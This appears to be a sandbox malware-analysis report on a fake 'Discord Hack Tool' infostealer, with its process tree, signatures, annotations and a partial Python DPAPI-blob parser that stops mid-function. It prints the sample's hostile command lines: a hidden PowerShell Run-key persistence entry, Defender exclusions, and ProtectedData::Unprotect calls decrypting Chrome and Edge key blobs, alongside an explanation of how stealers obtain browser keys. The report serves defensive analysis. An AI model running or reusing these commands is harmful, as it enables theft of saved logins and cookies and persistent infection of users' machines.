Analysis

max time kernel: 58s
max time network: 66s
platform: windows11-21h2_x64
resource: win11-20241007-en
resource tags: arch:x64, arch:x86, image:win11-20241007-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 02/11/2024, 10:16

Static task: static1
URLScan task: urlscan1
Behavioral task: behavioral1
Sample: https://mega.nz/file/ps1WVI4C#4Ora6QCwbLreKoWbQVQCdGpJze4nYQdeHyypMx-b2dU
Resource: win11-20241007-en

General

Target: https://mega.nz/file/ps1WVI4C#4Ora6QCwbLreKoWbQVQCdGpJze4nYQdeHyypMx-b2dU
Malware Config

Signatures

Blocklisted process makes network request (1 IoC)
flow 68: PID 2340 curl.exe

Command and Scripting Interpreter: PowerShell (1 TTP, 5 IoCs)
Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes. In this run only PIDs 2684 and 5692 actually call Add-MpPreference -ExclusionPath (see the process tree); PID 5488 is the stdin-fed first stage and PID 676 is the Get-Clipboard.ps1 launch. PID 2144 does not appear in the visible part of the tree.
PIDs: 2684 powershell.exe, 5692 powershell.exe, 5488 powershell.exe, 2144 powershell.exe, 676 powershell.exe
Clipboard Data (1 TTP, 1 IoC)
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
PID: 792 cmd.exe

Executes dropped EXE (1 IoC)
PID: 5240 Discord Hack Tool.exe

Loads dropped DLL (1 IoC)
PID: 5240 Discord Hack Tool.exe

Reads user/profile data of web browsers (3 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Adds Run key to start application (2 TTPs, 2 IoCs)
Set value (str): \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Roaming\\kNPBRiEUjxJrLAI.ps1\"" (powershell.exe)
Set value (str): \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\Downloads\\Discord Hack Tool.exe" (reg.exe)

Hide Artifacts: Hidden Window (1 TTP, 1 IoC)
Windows that would typically be displayed when an application carries out an operation can be hidden.
PID: 792 cmd.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
flow 13: discord.com
flow 63: discord.com

Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow 1: api.ipify.org
An obfuscated cmd.exe command-line is typically used to evade detection (2 IoCs)
PIDs: 6132 cmd.exe, 2776 cmd.exe
Caveat: neither command line is obfuscated in the usual sense. Both are long because they embed a DPAPI blob inline as a decimal byte array for ProtectedData::Unprotect (the full text is in the process tree below), so treat this hit as a length heuristic and read the content directly.
Enumerates processes with tasklist (1 TTP, 2 IoCs)
PIDs: 3164 tasklist.exe, 4528 tasklist.exe
Subvert Trust Controls: Mark-of-the-Web Bypass (1 TTP, 1 IoC)
When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier whose content is known as the MOTW.
File opened for modification: C:\Users\Admin\Downloads\Discord Hack Tool.exe:Zone.Identifier (msedge.exe)
Caveat: the process writing this stream is msedge.exe's quarantine utility (PID 2240 in the process tree), i.e. the browser applying the tag at download time. Nothing in this report shows the sample itself stripping or rewriting Zone.Identifier, so the hit should not be read as an MOTW bypass performed by the malware.
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Detects videocard installed (1 TTP, 17 IoCs)
Uses WMIC.exe to determine videocard installed.
PIDs (all WMIC.exe): 1900, 3352, 5540, 6128, 3408, 5540, 3204, 5568, 5556, 4796, 1508, 4676, 3356, 1400, 5908, 4236, 976

Enumerates system info in registry (2 TTPs, 3 IoCs)
Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS (msedge.exe)
Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer (msedge.exe)
Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName (msedge.exe)

Kills process with taskkill (1 IoC)
PID: 5952 taskkill.exe

Modifies registry class (5 IoCs)
Key created: \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings (msedge.exe)
Set value (str): \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix (BackgroundTransferHost.exe)
Set value (str): \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" (BackgroundTransferHost.exe)
Set value (str): \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" (BackgroundTransferHost.exe)
Key created: \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\MuiCache (BackgroundTransferHost.exe)

Modifies registry key (1 TTP, 2 IoCs)
PIDs: 5652 reg.exe, 5276 reg.exe

NTFS ADS (2 IoCs)
File opened for modification: C:\Users\Admin\Downloads\Unconfirmed 111331.crdownload:SmartScreen (msedge.exe)
File opened for modification: C:\Users\Admin\Downloads\Discord Hack Tool.exe:Zone.Identifier (msedge.exe)

Scheduled Task/Job: Scheduled Task (1 TTP, 1 IoC)
Schtasks is often used by malware for persistence or to perform post-infection execution.
PID: 5292 schtasks.exe

Suspicious behavior: EnumeratesProcesses (53 IoCs)
Repeated entries per process. Distinct PIDs: msedge.exe 4364, 5728, 5284, 2240; identity_helper.exe 3048; powershell.exe 5488, 1004, 2760, 676, 2684, 3740, 5692, 3620, 5252, 2144, 880, 6008, 2216, 412, 5672, 4996, 4256

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (7 IoCs)
PID 5728 msedge.exe (7 entries)

Suspicious use of AdjustPrivilegeToken (64 IoCs)
5516 AUDIODG.EXE: token 33, SeIncBasePriorityPrivilege
5488, 1004, 2760 powershell.exe: SeDebugPrivilege
3164, 4528 tasklist.exe: SeDebugPrivilege
5952 taskkill.exe: SeDebugPrivilege
5732 WMIC.exe (the full set is listed twice): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, tokens 33, 34, 35, 36
464 WMIC.exe: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege (list cut at the 64-entry limit)

Suspicious use of FindShellTrayWindow (35 IoCs)
PID 5728 msedge.exe (35 entries)

Suspicious use of SendNotifyMessage (12 IoCs)
PID 5728 msedge.exe (12 entries)

Suspicious use of WriteProcessMemory (64 IoCs)
PID 5728 msedge.exe wrote to the memory of its own child processes: 2972 (procid_target 77), 3128 (78), 4364 (79), 2056 (80). The 64 listed entries are repeats of these four pairs, most of them against 3128 and 2056; this is normal browser process bootstrapping.

Uses Task Scheduler COM API (1 TTP)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes

[1] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://mega.nz/file/ps1WVI4C#4Ora6QCwbLreKoWbQVQCdGpJze4nYQdeHyypMx-b2dU
    - Enumerates system info in registry
    - Modifies registry class
    - NTFS ADS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID: 5728

  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffac1093cb8,0x7ffac1093cc8,0x7ffac1093cd8
      PID: 2972

  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1828 /prefetch:2
      PID: 3128

  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2352 /prefetch:3
      - Suspicious behavior: EnumeratesProcesses
      PID: 4364

  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2772 /prefetch:8
      PID: 2056

  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3216 /prefetch:1
      PID: 1496

  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:1
      PID: 1544

  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5072 /prefetch:8
      PID: 2216

  [2] C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5404 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses
      PID: 3048

  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5488 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses
      PID: 5284

  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5564 /prefetch:1
      PID: 5232

  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:1
      PID: 4588

  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5456 /prefetch:1
      PID: 1488

  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5600 /prefetch:1
      PID: 4620

  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5544 /prefetch:1
      PID: 1624

  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6196 /prefetch:8
      PID: 3960

  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1900,10520952442971786462,10653601658162394679,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5588 /prefetch:8
      - Subvert Trust Controls: Mark-of-the-Web Bypass
      - NTFS ADS
      - Suspicious behavior: EnumeratesProcesses
      PID: 2240

[1] C:\Windows\System32\CompPkgSrv.exe
    C:\Windows\System32\CompPkgSrv.exe -Embedding
    PID: 4668

[1] C:\Windows\System32\CompPkgSrv.exe
    C:\Windows\System32\CompPkgSrv.exe -Embedding
    PID: 396

[1] C:\Windows\system32\AUDIODG.EXE
    C:\Windows\system32\AUDIODG.EXE 0x00000000000004CC 0x00000000000004C8
    - Suspicious use of AdjustPrivilegeToken
    PID: 5516

[1] C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    PID: 3304

[1] C:\Windows\system32\BackgroundTransferHost.exe
    "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13
    - Modifies registry class
    PID: 904
[1] C:\Users\Admin\Downloads\Discord Hack Tool.exe
    "C:\Users\Admin\Downloads\Discord Hack Tool.exe"
    - Executes dropped EXE
    - Loads dropped DLL
    PID: 5240

  [2] C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"
      PID: 972

    [3] C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "
        PID: 2684

    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -noprofile -
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 5488

      [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lkpv3aqj\lkpv3aqj.cmdline"
          PID: 2180

        [5] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5743.tmp" "c:\Users\Admin\AppData\Local\Temp\lkpv3aqj\CSCFE21C5C5317A4A3B81B3616149D2A28F.TMP"
            PID: 3732

      (csc.exe followed by cvtres.exe under powershell.exe is the footprint of Add-Type compiling inline C#. The script is read from .\temp.ps1 and piped over stdin, so the PowerShell command line carries no -File argument to log; the temporary .cmdline and compiler output under %TEMP%\lkpv3aqj are the on-disk trace.)

  [2] C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
      PID: 5100

    [3] C:\Windows\system32\curl.exe
        curl http://api.ipify.org/ --ssl-no-revoke
        PID: 4884

  [2] C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      PID: 5896

    [3] C:\Windows\system32\tasklist.exe
        tasklist
        - Enumerates processes with tasklist
        - Suspicious use of AdjustPrivilegeToken
        PID: 3164

  [2] C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM msedge.exe /F"
      PID: 3452

    [3] C:\Windows\system32\taskkill.exe
        taskkill /IM msedge.exe /F
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
        PID: 5952

  [2] C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      PID: 2360

    [3] C:\Windows\system32\tasklist.exe
        tasklist
        - Enumerates processes with tasklist
        - Suspicious use of AdjustPrivilegeToken
        PID: 4528

  [2] C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,113,154,240,142,21,157,156,78,160,101,81,241,32,249,16,209,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,211,28,158,119,153,136,182,186,182,140,27,224,31,42,98,129,163,229,214,162,157,251,88,76,220,88,221,7,153,80,43,164,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,73,238,243,217,56,219,60,215,158,4,156,83,176,178,11,120,89,232,124,19,242,192,178,55,240,49,194,69,138,96,135,246,48,0,0,0,247,207,103,230,202,205,245,16,28,172,229,124,165,210,103,11,12,196,151,9,133,66,194,65,60,120,27,246,170,191,96,70,11,157,69,109,12,146,76,15,40,174,22,143,72,151,144,247,64,0,0,0,115,234,32,151,10,195,106,72,177,234,146,232,226,223,217,32,37,34,73,140,60,63,44,119,69,178,221,216,32,90,64,50,251,204,43,72,162,246,93,112,88,166,6,206,203,162,130,9,122,1,244,137,33,40,119,80,4,220,69,84,249,136,212,38), $null, 'CurrentUser')"
      - An obfuscated cmd.exe command-line is typically used to evade detection.
      PID: 6132

    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,113,154,240,142,21,157,156,78,160,101,81,241,32,249,16,209,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,211,28,158,119,153,136,182,186,182,140,27,224,31,42,98,129,163,229,214,162,157,251,88,76,220,88,221,7,153,80,43,164,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,73,238,243,217,56,219,60,215,158,4,156,83,176,178,11,120,89,232,124,19,242,192,178,55,240,49,194,69,138,96,135,246,48,0,0,0,247,207,103,230,202,205,245,16,28,172,229,124,165,210,103,11,12,196,151,9,133,66,194,65,60,120,27,246,170,191,96,70,11,157,69,109,12,146,76,15,40,174,22,143,72,151,144,247,64,0,0,0,115,234,32,151,10,195,106,72,177,234,146,232,226,223,217,32,37,34,73,140,60,63,44,119,69,178,221,216,32,90,64,50,251,204,43,72,162,246,93,112,88,166,6,206,203,162,130,9,122,1,244,137,33,40,119,80,4,220,69,84,249,136,212,38), $null, 'CurrentUser')
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 1004

  [2] C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,113,154,240,142,21,157,156,78,160,101,81,241,32,249,16,209,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,31,48,144,108,207,129,155,216,190,151,157,5,189,241,192,119,137,99,209,251,98,98,91,220,150,5,90,153,197,206,48,164,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,13,137,9,5,230,251,57,83,172,255,40,11,186,253,131,189,197,13,86,207,38,80,198,155,11,79,187,135,218,23,125,55,48,0,0,0,113,8,144,157,12,116,63,185,105,105,23,186,43,229,43,106,179,77,150,110,109,71,254,235,182,187,4,154,144,64,102,67,123,244,131,194,46,176,17,65,169,35,210,81,155,166,172,206,64,0,0,0,116,145,179,250,150,114,228,181,200,106,171,97,108,118,55,142,78,175,172,137,114,215,45,79,209,59,230,217,8,171,32,40,184,211,189,34,198,199,25,17,191,228,191,12,253,74,212,79,132,18,215,250,7,249,108,169,123,58,128,185,63,77,159,138), $null, 'CurrentUser')"
      - An obfuscated cmd.exe command-line is typically used to evade detection.
      PID: 2776

    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,113,154,240,142,21,157,156,78,160,101,81,241,32,249,16,209,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,31,48,144,108,207,129,155,216,190,151,157,5,189,241,192,119,137,99,209,251,98,98,91,220,150,5,90,153,197,206,48,164,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,13,137,9,5,230,251,57,83,172,255,40,11,186,253,131,189,197,13,86,207,38,80,198,155,11,79,187,135,218,23,125,55,48,0,0,0,113,8,144,157,12,116,63,185,105,105,23,186,43,229,43,106,179,77,150,110,109,71,254,235,182,187,4,154,144,64,102,67,123,244,131,194,46,176,17,65,169,35,210,81,155,166,172,206,64,0,0,0,116,145,179,250,150,114,228,181,200,106,171,97,108,118,55,142,78,175,172,137,114,215,45,79,209,59,230,217,8,171,32,40,184,211,189,34,198,199,25,17,191,228,191,12,253,74,212,79,132,18,215,250,7,249,108,169,123,58,128,185,63,77,159,138), $null, 'CurrentUser')
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 2760
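The two PowerShell calls above (PIDs 1004 and 2760) hand a CryptProtectData blob to ProtectedData::Unprotect. Chromium-based browsers keep the AES key that protects saved logins and cookies in the profile's Local State file under os_crypt.encrypted_key, base64-encoded with a five-byte "DPAPI" prefix in front of the blob; stripping that prefix and calling Unprotect in the logged-on user's context is all a stealer needs, which is why this step runs as the user with no privilege escalation. The following Python is an added example written for this page, not code from the sample or from the sandbox: it walks the DPAPI blob header layout over the two byte arrays copied verbatim from the command lines, so the structure can be checked offline. It cannot decrypt anything (that needs the user's master key, which is not in the report), and the os_crypt heuristic at the end is an assumption based on key size, not something the report states.

```python
"""Parse the DPAPI blobs the sample passes to ProtectedData::Unprotect (added example)."""
import struct
import uuid

# The provider GUID every CryptProtectData blob starts with (well-known constant).
DPAPI_PROVIDER = "df9d8cd0-1501-11d1-8c7a-00c04fc297eb"
ALG_NAMES = {0x6610: "CALG_AES_256", 0x6603: "CALG_3DES", 0x800E: "CALG_SHA_512", 0x8004: "CALG_SHA1"}

# Byte arrays copied verbatim from the two powershell.exe command lines above (PID 1004 / PID 2760).
CHROME_BLOB = bytes([
    1, 0, 0, 0,                                                    # dwVersion = 1
    208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,      # provider GUID
    1, 0, 0, 0,                                                    # master key version
    113,154,240,142,21,157,156,78,160,101,81,241,32,249,16,209,    # master key GUID
    16, 0, 0, 0,                                                   # flags
    28, 0, 0, 0,                                                   # description length
    71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,  # "Google Chrome\0"
    16, 102, 0, 0, 0, 1, 0, 0,                                     # algCrypt, key bits
    32, 0, 0, 0,                                                   # salt length
    211,28,158,119,153,136,182,186,182,140,27,224,31,42,98,129,
    163,229,214,162,157,251,88,76,220,88,221,7,153,80,43,164,
    0, 0, 0, 0,                                                    # HMAC key length
    14, 128, 0, 0, 0, 2, 0, 0,                                     # algHash, hash bits
    32, 0, 0, 0,                                                   # HMAC2 key length
    73,238,243,217,56,219,60,215,158,4,156,83,176,178,11,120,
    89,232,124,19,242,192,178,55,240,49,194,69,138,96,135,246,
    48, 0, 0, 0,                                                   # data (ciphertext) length
    247,207,103,230,202,205,245,16,28,172,229,124,165,210,103,11,
    12,196,151,9,133,66,194,65,60,120,27,246,170,191,96,70,
    11,157,69,109,12,146,76,15,40,174,22,143,72,151,144,247,
    64, 0, 0, 0,                                                   # signature length
    115,234,32,151,10,195,106,72,177,234,146,232,226,223,217,32,
    37,34,73,140,60,63,44,119,69,178,221,216,32,90,64,50,
    251,204,43,72,162,246,93,112,88,166,6,206,203,162,130,9,
    122,1,244,137,33,40,119,80,4,220,69,84,249,136,212,38,
])
EDGE_BLOB = bytes([
    1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,
    1,0,0,0,113,154,240,142,21,157,156,78,160,101,81,241,32,249,16,209,
    16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,
    31,48,144,108,207,129,155,216,190,151,157,5,189,241,192,119,
    137,99,209,251,98,98,91,220,150,5,90,153,197,206,48,164,
    0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,
    13,137,9,5,230,251,57,83,172,255,40,11,186,253,131,189,
    197,13,86,207,38,80,198,155,11,79,187,135,218,23,125,55,
    48,0,0,0,
    113,8,144,157,12,116,63,185,105,105,23,186,43,229,43,106,
    179,77,150,110,109,71,254,235,182,187,4,154,144,64,102,67,
    123,244,131,194,46,176,17,65,169,35,210,81,155,166,172,206,
    64,0,0,0,
    116,145,179,250,150,114,228,181,200,106,171,97,108,118,55,142,
    78,175,172,137,114,215,45,79,209,59,230,217,8,171,32,40,
    184,211,189,34,198,199,25,17,191,228,191,12,253,74,212,79,
    132,18,215,250,7,249,108,169,123,58,128,185,63,77,159,138,
])


def parse_dpapi_blob(blob: bytes) -> dict:
    """Walk the CryptProtectData blob layout (all integers little-endian) and return its fields."""
    pos = 0

    def u32() -> int:
        nonlocal pos
        (value,) = struct.unpack_from("<I", blob, pos)
        pos += 4
        return value

    def take(n: int) -> bytes:
        nonlocal pos
        chunk = blob[pos:pos + n]
        if len(chunk) != n:
            raise ValueError("blob truncated")
        pos += n
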